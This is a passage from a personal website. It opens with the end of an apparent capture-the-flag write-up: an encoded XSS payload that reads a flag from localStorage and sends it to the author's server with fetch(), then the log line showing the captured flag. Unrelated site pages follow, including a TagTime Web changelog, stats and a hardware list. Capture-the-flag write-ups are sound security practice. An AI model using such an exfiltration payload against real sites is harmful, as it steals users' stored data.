BE%2BT%2BU%2BR%2BN%2B%27%20%5B%27%2BL%2BO%2BC%2BA%2BL%2B%27S%27%2BT%2BO%2BR%2BA%2BG%2BE%2B%27%2C%27%2BF%2BE%2BT%2BC%2BH%2B%27%5D%27)()%3BFE(%27HTTPS%3A%2F%2FBOX.SMITOP.COM%2F%27%2BLS%5BF%2BL%2BA%2BG%5D)%3B%22%3E

I then watched the request log on my server to get the flag:

2022/02/06 11:20:55 [error] 7483#7483: *33969 open() "/home/user-data/www/default/dice{1_dont_know_how_to_write_wasm_pwn_s0rry}" failed (2: No such file or directory), client: 34.139.106.105, server: box.smitop.com, request: "GET /dice%7B1_dont_know_how_to_write_wasm_pwn_s0rry%7D HTTP/2.0", host: "box.smitop.com", referrer: "https://blazingfast.mc.ax/"</code>

  1. Although I didn’t realize that at first, and spent a considerable amount of time reverse engineering the WASM module. ↩︎

Full stream

By · · 2 minute read

This is every public thing authored by me that my stream system knows about. My homepage is generated as a filtered version of this.

Full stream - mini mode

By · · 2 minute read

Fun facts about me

By · · 2 minute read

Hashes

By · · 2 minute read
  • d7766692832c6906bf74a991692abd7b4a362f84fcca0b8f500b1c27aeef3cfc

My bookmarklets

By · · 2 minute read

These are various bookmarklets I use. You can drag them to your bookmarks bar, then click to activate them when desired.

Ps

By · · 0 minute read

Streams

By · · 0 minute read

TagTime Web changelog

By · · 2 minute read

These are the updates to TagTime Web since I started keeping a changelog (which is fairly recently).

v757 (July 29, 2021)

  • Added “Correlation” graph for finding correlations between types of pings
  • Added quick options for the last 3 tags when entering tags
  • Added option in Settings > Display to make the homescreen show a nice gradient when no tags are pending
  • Increased the font size on the homepage a bit
  • Improved the design of the logged-out homepage
  • Made it so the TTW tab is focused when a notification is clicked
  • Adjusted the wording of various messages
  • Fixed errors on some older browsers
  • Added support for hitting quote to enter last pings when in Pings page
  • API clients: added support for merging tags on backend for API clients
  • Behind the scenes: added unit tests for the backend server

TagTime Web stats

By · · 2 minute read

As of October 29, 2021:

  • 112 total accounts

  • 89 total accounts have responded to at least one ping

  • 23 accounts have never responded to a ping

  • 1 users responded to a ping in the last 30 days

  • 1 users responded to a ping in the last 7 days

  • largest database is 166 pages (1.6% of max)

Things I use

By · · 2 minute read

Inspired by uses.tech

Software

Web-based software

  • Glitch for doing some front-end development work
  • Desmos for math
  • Element for chatting over Matrix

Hardware

  • Main development computer:
    • CPU: AMD Ryzen 3400G
    • 16GB of RAM
    • 500GB SSD
    • 3 attached monitors, one 24" and two 22"
    • Pressure sensitive drawing tablet for drawing things
  • Phone: